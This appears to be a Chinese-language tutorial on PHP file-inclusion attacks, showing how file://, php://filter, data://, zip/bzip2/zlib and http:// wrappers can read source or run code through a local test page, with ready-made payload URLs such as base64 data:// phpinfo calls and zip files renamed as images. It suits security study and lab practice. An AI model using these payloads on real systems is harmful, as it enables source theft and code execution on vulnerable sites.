IT数码 购物 网址 头条 软件 日历 阅读 图书馆
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
图片批量下载器
↓批量下载图片,美女图库↓
图片自动播放器
↓图片自动播放器↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁
 
   -> PHP知识库 -> php伪协议 文件包含(一) -> 正文阅读

[PHP知识库]php伪协议 文件包含(一)

测试代码如下

file://?协议

  • 条件

    • allow_url_fopen:off/on

    • allow_url_include?:off/on

  • 示例

    1. file://[文件的绝对路径和文件名]

      http://127.0.0.1/include.php?shell=file://D:\phpstudy_pro\www\test.txt
    2. [文件的相对路径和文件名]

      http://127.0.0.1/include.php?shell=./test.txt
    3. [http://网络路径和文件名]

      http://127.0.0.1/include.php?shell=http://127.0.0.1/test.txt

?利用file://协议读取test.txt

读取成功?

?php://filter

  • 条件

    • allow_url_fopen:off/on

    • allow_url_include?:仅php://input php://stdin php://memory php://temp?需要on

php://filter/read=convert.base64-encode/resource=[文件名]读取文件源码(针对php文件需要base64编码)

读取本地文件并以base64格式输出

?

?再解密

利用成功

在1.txt文件中内容如下

data://?协议

  • 条件

    • allow_url_fopen:on

    • allow_url_include?:on

  • 作用:自PHP>=5.2.0起,可以使用data://数据流封装器,以传递相应格式的数据。通常可以用来执行PHP代码。

  • 用法

    data://text/plain,
    data://text/plain;base64,
  • 示例

    1. data://text/plain,

      http://127.0.0.1/include.php?shell=data://text/plain,%20phpinfo();
    2. data://text/plain;base64,

      http://127.0.0.1/include.php?shell=data://text/plain;base64,PD9waHAgcGhwaW5mbygpOz8%2b

?zip:// & bzip2:// & zlib://?协议

  • 条件

    • allow_url_fopen:off/on

    • allow_url_include?:off/on

  • 作用zip:// & bzip2:// & zlib://?均属于压缩流,可以访问压缩文件中的子文件,更重要的是不需要指定后缀名,可修改为任意后缀:jpg png gif xxx?等等。

  • 示例

    1. zip://[压缩文件绝对路径]%23[压缩文件内的子文件名](#编码为%23)

      压缩 phpinfo.txt 为 phpinfo.zip ,压缩包重命名为 phpinfo.jpg ,并上传

      http://127.0.0.1/include.php?shell=zip://D:\phpstudy_pro\1.jpg%231.txt
      
    2. compress.bzip2://file.bz2

      压缩 phpinfo.txt 为 phpinfo.bz2 并上传(同样支持任意后缀名)

      http://127.0.0.1/include.php?shell=compress.bzip2://D:\phpStudy_pro\WWW\1.bz2
      
    3. compress.zlib://file.gz

      压缩 phpinfo.txt 为 phpinfo.gz 并上传(同样支持任意后缀名)

      http://127.0.0.1/include.php?shell=compress.zlib://D:\phpStudy_pro\WWW\1.gz

?将1.txt文件压缩为1.zip,如果不支持此文件,可以将后缀改为jpg png gif xxx等格式

http:// & https://?协议

  • 条件

    • allow_url_fopen:on

    • allow_url_include?:on

  • 作用:常规 URL 形式,允许通过?HTTP 1.0?的 GET方法,以只读访问文件或资源。CTF中通常用于远程包含。

  • 用法

    http://example.com
    http://example.com/file.php?var1=val1&var2=val2
    http://user:password@example.com
    https://example.com
    https://example.com/file.php?var1=val1&var2=val2
    https://user:password@example.com
  • 示例

    http://127.0.0.1/include.php?http=http://127.0.0.1/1.txt

  PHP知识库 最新文章
Laravel 下实现 Google 2fa 验证
UUCTF WP
DASCTF10月 web
XAMPP任意命令执行提升权限漏洞(CVE-2020-
[GYCTF2020]Easyphp
iwebsec靶场 代码执行关卡通关笔记
多个线程同步执行,多个线程依次执行,多个
php 没事记录下常用方法 (TP5.1)
php之jwt
2021-09-18
上一篇文章      下一篇文章      查看所有文章
加:2022-10-22 20:56:11  更:2022-10-22 20:56:24 
 
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁

360图书馆 购物 三丰科技 阅读网 日历 万年历 2024年11日历 -2024/11/22 19:37:31-

图片自动播放器
↓图片自动播放器↓
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
图片批量下载器
↓批量下载图片,美女图库↓
  网站联系: qq:121756557 email:121756557@qq.com  IT数码